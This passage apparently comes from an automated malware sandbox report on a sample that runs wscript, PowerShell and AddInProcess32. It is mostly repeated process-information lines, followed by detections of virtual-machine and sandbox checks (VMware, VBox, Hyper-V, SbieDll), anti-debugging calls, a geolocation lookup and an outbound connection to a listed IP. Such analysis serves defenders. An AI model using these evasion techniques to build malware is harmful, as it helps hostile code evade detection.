                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-^Q
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1585Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1506Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3655Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6134Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep count: 3655 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep count: 6134 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406B2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800}
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kF6R0WSVoJ8YrOAvya0p3w5rMt7DTIMJ%2B%2F%2FQx%2FbcliIlPx%2FFRtnafd5lYwKxC06rOXwTXUeFthAcjEaIL%2Fh74oSSRF1SVDLvV8IPD5vhYd%2FrzQS9KqEmunji4amWHCZCdGH%2BRh5NPFpy"}],"group":"cf-nel","max_age":604800}
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: wscript.exe, 00000000.00000003.1687919767.000002262F338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: AddInProcess32.exe, 00000004.00000002.2985019113.0000000005D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                  Source: wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpy
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E17068 CheckRemoteDebuggerPresent,4_2_00E17068
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
